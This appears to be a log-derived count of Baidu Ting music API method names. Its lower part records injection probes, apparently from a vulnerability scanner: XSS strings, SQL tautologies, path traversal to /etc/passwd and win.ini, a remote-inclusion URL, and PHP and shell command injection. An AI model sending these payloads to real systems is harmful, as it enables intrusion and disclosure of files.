baidu.ting.song.getInfos	61929418
baidu.ting.search.lrcpic	27973451
baidu.ting.song.baseInfo	27903065
baidu.ting.search.catalogSug	23041161
baidu.ting.user.listenAge	18889150
baidu.ting.song.play	17853406
baidu.ting.search.common	13383614
baidu.ting.song.down	9101602
baidu.ting.song.lry	7944911
baidu.ting.user.getUserBaseInfo	7759714
baidu.ting.artist.getSongList	5596565
baidu.ting.artist.getList	5263386
baidu.ting.favorite.isCollect	5243872
ting.baidu.diy.getPlaylists	5064604
baidu.ting.song.getInfo	5039736
baidu.ting.search.lrcys	4763853
baidu.ting.billboard.billList	4748947
baidu.ting.search.getPhotoInfos	4435749
baidu.ting.game.gamedetail	3602643
baidu.ting.user.config	3504882
baidu.ting.user.checkSuggestVersion	3474894
baidu.ting.plaza.getRecommendAlbum	3289273
baidu.ting.user.checkComVersion	3035788
baidu.ting.plaza.active	2820202
baidu.ting.artist.getInfo	2766051
baidu.ting.active.start	2739139
baidu.ting.radio.playAction	2623379
baidu.ting.diy.gedanInfo	2425189
baidu.ting.user.registToUC	2413187
baidu.ting.plaza.getFocusPic	2148002
baidu.ting.album.getAlbumInfo	2042720
baidu.ting.diy.gedanHot	1777505
baidu.ting.user.getMessage	1644918
baidu.ting.search.suggestion	1487976
baidu.ting.artist.getinfo	1470053
baidu.ting.diy.category	1392675
ting.baidu.plaza.recdaily	1373396
baidu.ting.radio.getChannelSong	1363908
baidu.ting.favorite.getCollectSong	1105923
baidu.ting.diy.addListenCount	1033960
baidu.ting.plaza.recdaily	1030773
baidu.ting.plaza.getPartDesc	988658
baidu.ting.artist.getAlbumList	885493
baidu.ting.user.down	785562
baidu.ting.feedback.song	781949
baidu.ting.song.audio	707169
baidu.ting.tag.songlist	692690
baidu.ting.user.RegistToImsg	687974
baidu.ting.tag.getHotTag	680600
baidu.ting.diy.getNowOfficalList	671415
baidu.ting.diy.gedan	667127
	635332
baidu.ting.diy.getSongFromOfficalList	510367
baidu.ting.radio.getCategoryList	463071
baidu.ting.search.getPhotoInfo	379792
baidu.ting.billboard.billCategory	374636
baidu.ting.search.lrcyss	351298
baidu.ting.artist.get72HotArtist	294771
baidu.ting.diy.getPlaylists	290335
baidu.ting.game.gamelist	226329
baidu.ting.plaza.recommend	207794
baidu.ting.favorite.getFavoriteSong	199447
baidu.ting.song.buffer	175825
baidu.ting.video.getList	163699
baidu.ting.song.getMulInfos	136714
baidu.ting.favorite.addSongFavorites	135885
baidu.ting.mv.getIndexMV	112396
baidu.ting.tag.getAllTag	109413
baidu.ting.favorite.addSongFavorite	106571
baidu.ting.diy.search	100326
baidu.ting.diy.getSimilarGedan	93910
baidu.ting.diy.getOfficialDiyList	91403
baidu.ting.video.play	79832
baidu.ting.user.checkVersion	54443
baidu.ting.radio.getFavoriteSong	53090
baidu.ting.artist.getSpecialSongList	49771
baidu.ting.favorite.delCollectSong	47447
baidu.ting.plaza.getNewSongs	45860
baidu.ting.mv.playMV	35407
ting.baidu.diy.getPlaylist	34875
baidu.ting.user.nplogin	32548
baidu.ting.radio.getArtistChannelSong	28800
baidu.ting.plaza.getArtistPlaza	20362
baidu.ting.diy.getPlaylist	19456
baidu.ting.radio.serv	18197
baidu.ting.feedback.crash	14749
baidu.ting.artist.getHighSongTitle	14401
baidu.ting.diy.saveList	12667
baidu.ting.album.getList	11666
baidu.ting.mv.searchMV	9798
baidu.ting.song.cloud	9645
baidu.ting.favorite.delSongFavorite	9439
ting.baidu.film.getFilmInfo	9275
baidu.ting.weixin.response	8228
baidu.ting.song.getMulInfo	7004
baidu.ting.artist.getQianQianArtist	6863
ting.baidu.song.lry	6605
baidu.ting.outerPassport.profile	5890
baidu.ting.diy.addListSong	5410
baidu.ting.video.category	5032
baidu.ting.song.playAAC	4854
baidu.ting.diy.delList	4830
baidu.ting.colorRing.listen	4782
baidu.ting.diy.delListSong	4761
baidu.ting.user.regPassport	4342
baidu.ting.user.logout	4339
baidu.ting.billboard.catalog	4156
baidu.ting.artist.getHighSongList	3417
baidu.ting.colorRing.getCode	3249
baidu.ting.user.getMobileVcode	2816
baidu.ting.colorRing.authset	2798
baidu.ting.favorite.delSongFavorites	2522
ting.baidu.artistapp.renum	2425
baidu.ting.diy.getRecommendSpeical	1727
baidu.ting.favorite.getFavoriteAlbum	1617
baidu.ting.feedback.info	1545
baidu.ting.mv.getMultiSongMVInfo	1542
baidu.ting.artist.getSongRank	1361
baidu.ting.artist.getSong	1310
ting.baidu.artistapp.brief	891
baidu.ting.mv.getMVCategory	836
baidu.ting.favorite.getListenHistory	756
baidu.ting.diy.addList	750
baidu.ting.diy.upList	657
baidu.ting.video.recMv	574
ting.baidu.search.lrcpic	555
baidu.ting.favorite.getOffenListenList	503
baidu.ting.colorRing.toneset	383
baidu.ting.colorRing.subscribe	376
baidu.ting.user.activate	341
baidu.ting.artist.getInfoList	322
baidu.ting.song.getSuoSongInfo	299
baidu.ting.artist.getInfoByName	296
ting.baidu.plaza.getFocusPic	290
baidu.ting.artistapp.photo	242
baidu.ting.favorite.addAlbumFavorite	235
baidu.ting.song.getHash	232
baidu.ting.user.login	204
baidu.ting.favorite.getInfoFromView	199
ting.baidu.artistapp.newList	146
ting.baidu.artistapp.news	106
baidu.ting.favorite.delAlbumFavorite	70
baidu.ting.user.addPassportInfo	57
baidu.ting.album.getAlbumstyle	51
baidu.ting.plaza.getMisNewSong	50
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	31
baidu.ting.game.catalog	27
ting.baidu.artistapp.briefs	18
ting.baidu.search.common	15
ting.baidu.song.getinfos	11
ting.baidu.song.getPic	9
ting.baidu.game.gamedetail	8
ting.baidu.favorite.getCollectSong	8
ting.baidu.mv.getArtistMVInfo	8
ting.baidu.tag.songlist	7
\' (	6
(	6
ting.baidu.search.playback	4
ting.baidu.plaza.recommend	4
ting.baidu.plaza.active	4
ting.baidu.game.catalog	4
ting.baidu.song.audio	4
	4
ting.baidu.feedback.crash	4
ting.baidu.mv.getMultiSongMVInfo	4
ting.baidu.mv.playmv	4
ting.baidu.mv.getindexmv	4
ting.baidu.diy.gedan	4
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.game.gameplay	3
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
../../../../../../../../../../etc/rc.d/rc.local_	2
baidu.ting.song.lry/\">abcd	2
${@print(md5(812812))}	2
../../../../../../../../../../etc/passwd_	2
../../../../../../../../../../etc/passwd	2
set	2
data://text/plain;base64,dGVzdA==_.html	2
file:///etc/passwd_.htm	2
baidu.ting.artist.getInfoList/\">abcd	2
file:///etc/rc.d/rc.local_	2
/usr/bin/id;	2
data://text/plain;base64,dGVzdA==_	2
http://cirt.lnet/rfiinc.txt	2
baidu.ting.song.play\';alert(1);\'	2
http://10.42.7.217/?1386247202.47	2
baidu.ting.kong.lry	2
http://10.42.7.217/?1386245541.92	2
data://text/plain;base64,dGVzdA==	2
baidu.ting.song.lry\';alert(1);\'	2
1\\\";cat /etc/rc.d/rc.local;\\\"	2
file:///etc/rc.d/rc.local	2
file:///etc/passwd	2
string:{var_dump(md5(812812))}	2
1;cat /etc/rc.d/rc.local;	2
%{	2
${	2
file:///etc/passwd_	2
\'];${@print(md5(812812))};//	2
1\';cat /etc/rc.d/rc.local;\'	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	2
baidu.ting.song.play/\">abcd	2
http://cirt.lnet/rfiinc.txt_	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	2
c:/windows/win.ini_	2
c:/windows/win.ini	2
../../../../../../../../../../etc/rc.d/rc.local	2
baidu.ting.song.lry--></script><script>alert(1)</script>	1
baidu.ting.song.play>\'>\"><script>alert(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.php	1
../../../../../../../../../../etc/rc.d/rc.local_.jpg	1
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.play</script><script>alert(1);//	1
baidu.ting.song.play<script>confirm(1)</script>	1
baidu.ting.song.lry</script><script>alert(1);//	1
baidu.ting.song.lry<script>confirm(1)</script>	1
baidu.ting.song.play\') and 8288=8288 and (\'	1
../../../../../../../../../../etc/passwd_.htm	1
baidu.ting.song.lry\') and 8288=8288 and (\'	1
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	1
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.play\' and \'8281\'=\'8281	1
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.lry\' and \'8281\'=\'8281	1
baidu.ting.favorite.getFavoriteSongCount	1
baidu.ting.song.playjavascript:alert(1)	1
baidu.ting.song.lryjavascript:alert(1)	1
baidu.ting.song.play\'\";alert(1);//	1
baidu.ting.song.lry\'\";alert(1);//	1
baidu.ting.song.play\";alert(1);\"	1
../../../../../../../../../../etc/passwd_.php	1
c:/windows/win.ini_.jpg	1
c:/windows/win.ini_.htm	1
baidu.ting6plaza.active	1
baidu.ting.song.lry\";alert(1);\"	1
baidu.ting.cloud.checkFile	1
http://cirt.lnet/rfiinc.txt_.php	1
http://cirt.lnet/rfiinc.txt_.jpg	1
baidu.ting.song.play;alert(1);//	1
ting.baidu.artistapp.send	1
file:///etc/rc.d/rc.local_.jpeg	1
baidu.ting.song.lry;alert(1);//	1
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	1
baidu.ting.mser.getUserBaseInfo	1
file:///etc/rc.d/rc.local_.php	1
baidu.ting.artist.getLis5	1
ting.baidu.plaza.getFoucuspic	1
ting.baidu.plaza.getFoucusPic	1
baidu.ting.user.updateProfile	1
baidu.ting.artist.getSongVote	1
ting.baidu.song.getInfos	1
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	1
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	1
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.play</textarea></title><script>alert(1)</script>	1
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	1
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baidu.ting.song.play--></script><script>alert(1)</script>	1
baidu.ting.sojo.getInfos	1
baidu.ting.searcp.lrcpic	1
baidu.ting.push.send	1
